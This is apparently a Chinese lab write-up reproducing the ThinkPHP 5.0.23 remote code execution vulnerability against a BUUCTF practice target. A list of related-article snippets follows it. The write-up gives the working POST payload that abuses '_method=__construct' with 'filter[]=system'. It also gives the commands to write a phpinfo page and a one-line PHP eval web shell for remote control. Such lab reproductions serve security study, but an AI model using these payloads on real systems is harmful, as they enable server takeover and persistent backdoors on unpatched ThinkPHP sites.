thinkphp5.0.23
Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
漏洞形成原因
框架介绍:
ThinkPHP是一款运用极广的PHP开发框架。
漏洞引入:
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。
靶场ip:http://node4.buuoj.cn:28700/
添加url后缀index.php?s=captcha
构造方法_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
这里我们可以用hackebar或者bp抓包修改
我用的是maxhackbar
后面就可以修改id来进行操作
Id改为
echo "<?php phpinfo(); ?>" > info.php
http://node4.buuoj.cn:28700/info.php
Info中有
或者尝试写入一句话
进行连接蚁剑
echo '<?php eval($_POST[aaa]); ?>' > shell.php
thinkphp5.0.23相关推荐
- php post 漏洞_ThinkPHP5 5.0.23 远程代码执行漏洞
作者介绍:Ice 国科学院安全学员,在国科学习安全课程,也参与在国科学生会安全团队中进行安全实战能力的提升.本次分享主要是针对现在一款运用极广的开发框架ThinkPHP的远程代码执行漏洞研究,希望给大 ...
- thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞
漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...
- thinkphp v5.0.11漏洞_ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞
12月9日,thinkPHP5.*发布了安全更新,这次更新修复了一处严重级别的漏洞,该漏洞可导致(php/系统)代码执行,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的ge ...
- thinkphp5.0.22漏洞利用
一.搭建环境 phpstudy的版本大于5.0 解压源码到www下 浏览器访问 127.0.0.1/thinkphp/public/index.php 漏洞利用 ?s=.|think\config/g ...
- ThinkPHP5.0中Redis的使用和封装(原创)
Redis是一种常用的非关系型数据库,主要用作数据缓存,数据保存形式为key-value,键值相互映射.它的数据存储跟MySQL不同,它数据存储在内存之中,所以数据读取相对而言很快,用来做高并发非常不 ...
- php104.tmp,ThinkPHP5.0多个文件上传后找不到临时文件的修改方法
这是修改之前的代码 if(!empty($_FILES)){ if(!empty($_FILES[org_positive])){ $org_positive = request()->file ...
- ThinkPHP5.0中Redis的使用和封装
2019独角兽企业重金招聘Python工程师标准>>> Redis是一种常用的非关系型数据库,主要用作数据缓存,数据保存形式为key-value,键值相互映射.它的数据存储跟MySQ ...
- mysql超详细教程_MySQL8.0.23安装超详细教程
前言 最近在做一个人脸识别的项目,需要用数据库保存学生信息与前段交互. MySQL的优点 1.mysql性能卓越,服务稳定,很少出现异常宕机. 2.mysql开放源代码且无版权制约,自主性及使用成本低 ...
- thinkphp5.0.9预处理导致的sql注入复现与详细分析
复现 先搭建thinkphp5.0.9环境 配置下测试环境 然后访问 http://tptest.cc/index.php/index/index/getage?names[0,updatexml(0 ...
最新文章
- 如果需要,npm检查并更新包
- python小项目实例流程-推荐三个最适合零基础小白练手的python项目,分享给你!...
- 在js对象上绑定js数组原生方法
- JavaScript中HTML的DOM
- 两数之和 python_同一屏幕播放两个视频 视频左右两个画面或视频上下两个画面如何制作...
- Matrix(二维hash)
- sql语句按月份统计查询
- -Head First Design Pattern- 大师与门徒(3) -Favor Composition over Inheritance
- 搞 Python 的程序员,不懂这一点,耽误自己成长!现在看还来得及
- (风中奇缘) Pocahontas
- mysql语句优化 explai_mysql使用explain优化sql语句
- redis连接数据库进行操作
- C++1.1 #include<iostream>
- 毕设-基于SSM仓库管理系统
- IDEA2019安装教程
- 433M、2.4G无线模块
- Warning: [antdv: LocaleProvider] `LocaleProvider` is deprecated. Please use `local
- 港中文深圳校区计算机研究生怎么样,香港中文大学(深圳)大概相当于国内什么水平高校...
- PLC常用标志位信号时序编程注意事项
- 金蝶云星空和小满OKKICRM单据接口对接